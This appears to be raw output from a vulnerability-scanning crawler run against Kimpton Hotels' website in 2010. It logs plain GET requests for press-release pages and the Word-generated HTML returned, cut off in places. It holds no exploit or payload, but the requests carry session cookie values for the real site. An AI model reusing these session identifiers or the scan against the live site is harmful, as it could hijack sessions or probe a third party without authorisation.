mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;
font-weight:bold;
mso-bidi-font-weight:normal;}
span.PlainTextChar
{mso-style-name:"Plain Text Char";
mso-style-noshow:yes;
mso-style-locked:yes;
mso-style-link:"Plain Text";
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="2050"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>

<body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'>

<div class=Section1>

<p class=MsoNormal><span style='font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype
id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt;
height:43pt'>
<v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/>
</v:shape><![endif]--><![if !vml]><img width=154 height=45
src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]><b
style='mso-bidi-font-weight:normal'><o:p></o:p></b></span></p>

<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR
IMMEDIATE RELEASE<o:p></o:p></span></b></p>

<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal><i style='mso-bidi-font-style:normal'><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><span
style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p>

<p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz
&amp; Company for Kimpton<o:p></o:p></span></b></p>

<p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Chloe
Mata Crane / 212-982-8300 x104 / <a href="mailto:cmcrane@baltzco.com">cmcrane@baltzco.com</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<o:p></o:p></span></p>

<p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Marliese
Engel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a>
<b><o:p></o:p></b></span></p>

<p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Kimpton
Hotels &amp; Restaurants<o:p></o:p></span></b></p>

<p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Stacey
Ellis / 415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial;mso-bidi-font-style:italic'>stacey.ellis@kimptongroup.com</span></a><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p>

<p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Jamie
Law / 415-955-5495 / </span><a href="mailto:jamie.law@kimptongroup.com"><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial;mso-bidi-font-style:italic'>jamie.law@kimptongroup.com</span></a><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p>

<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></p>

<p class=MsoNormal align=center style='text-align:center'><b><span
style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal align=center style='text-align:center'><b><span
style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>KIMPTON
GARNERS LEADING CUSTOMER SATISFACTION SCORE<o:p></o:p></span></b></p>

<p class=MsoNormal align=center style='text-align:center'><b><i><span
style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Boutique
Hotel Company Keeps Guests Happy <o:p></o:p></span></i></b></p>

<p class=MsoNormal align=center style='text-align:center'><b><i><span
style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>According
to 2009 Market Metrix Hospitality Index<o:p></o:p></span></i></b></p>

<p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:
12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial;
mso-bidi-font-weight:bold'><o:p&g..
- /pdfs/press/html/Nature-Conservancy-1009/

/pdfs/press/html/Nature-Conservancy-1009/

http://www.kimptonhotels.com/pdfs/press/html/Nature-Conservancy-1009/

Request

GET /pdfs/press/html/Nature-Conservancy-1009/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Nature-Conservancy-1009/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 31549
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<link rel=OLE-Object-Data href="images/oledata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>Marliese Engel</o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>3</o:TotalTime>
<o:LastPrinted>2009-08-04T19:42:00Z</o:LastPrinted>
<o:Created>2009-10-07T22:47:00Z</o:Created>
<o:LastSaved>2009-10-07T22:47:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>928</o:Words>
<o:Characters>5292</o:Characters>
<o:Company>Baltz &amp; Company</o:Company>
<o:Lines>44</o:Lines>
<o:Paragraphs>10</o:Paragraphs>
<o:CharactersWithSpaces>6498</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:DontGrowAutofit/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
h1
{mso-style-link:"Heading 1 Char";
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
mso-bidi-font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
p.MsoDocumentMap, li.MsoDocumentMap, div.MsoDocumentMap
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
background:navy;
font-size:10.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{mso-style-noshow:yes;
mso-style-link:"Plain Text Char";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;
font-weight:bold;
mso-bidi-font-weight:normal;}
span.PlainTextChar
{mso-style-name:"Plain Text Char";
mso-style-noshow:yes;
mso-style-locked:yes;
mso-style-link:"Plain Text";
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;}
p.CharChar1CharChar, li.CharChar1CharChar, div.CharChar1CharChar
{mso-style-name:" Char Char1 Char Char";
margin-top:0in;
margin-right:0in;
margin-bottom:8.0pt;
margin-left:0in;
text-align:justify;
line-height:12.0pt;
mso-line-height-rule:exactly;
mso-pagination:none;
mso-layout-grid-align:none;
font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:"Times New Roman";
mso-bidi-font-family:Arial;
mso-ansi-language:DE-CH;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:762846213;
mso-list-type:hybrid;
mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l0:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l1
{mso-list-id:1241058028;
mso-list-type:hybrid;
mso-list-template-ids:1236678956 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2
{mso-list-id:1319529687;
mso-list-type:hybrid;
mso-list-template-ids:2038327704 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0FC;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l2:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3
{mso-list-id:1851023485;
mso-list-type:hybrid;
mso-list-template-ids:-1010268010 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4
{mso-list-id:2057967201;
mso-list-type:hybrid;
mso-list-template-ids:-2130538154 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:"Courier New";}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="2050"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>

<body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'>

<div class=Section1>

<p class=MsoNormal><span style='font-family:Arial;mso-fareast-font-family:Times;
mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:171pt;
height:1in' o:ole="">
<v:imagedata src="images/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=173 height=74
src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]><!--[if gte mso 9]><xml>
<o:OLEObject Type="Embed" ProgID="Photoshop.Image.6" ShapeID="_x0000_i1025"
DrawAspect="Content" ObjectID="_1190291612">
<o:WordFieldCodes>\s</o:WordFieldCodes>
</o:OLEObject>
</xml><![endif]--></span><b style='mso-bidi-font-weight:normal'><span
style='font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></b></p>

<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal style='mso-outline-level:1'><b style='mso-bidi-font-weight:
normal'><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:
Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p>

<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal><i style='mso-bidi-font-style:normal'><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial'>Media Contacts:..
- /pdfs/press/html/Palomar-Chicago-1109/index.html

/pdfs/press/html/Palomar-Chicago-1109/index.html

http://www.kimptonhotels.com/pdfs/press/html/Palomar-Chicago-1109/index.html

Request

GET /pdfs/press/html/Palomar-Chicago-1109/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26291
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>scrocker</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>3</o:TotalTime> <o:LastPrinted>2009-11-05T22:56:00Z</o:LastPrinted> <o:Created>2010-02-05T00:12:00Z</o:Created> <o:LastSaved>2010-02-05T00:12:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>892</o:Words> <o:Characters>5087</o:Characters> <o:Company>Kimptongroup</o:Company> <o:Lines>42</o:Lines> <o:Paragraphs>10</o:Paragraphs> <o:CharactersWithSpaces>6247</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, 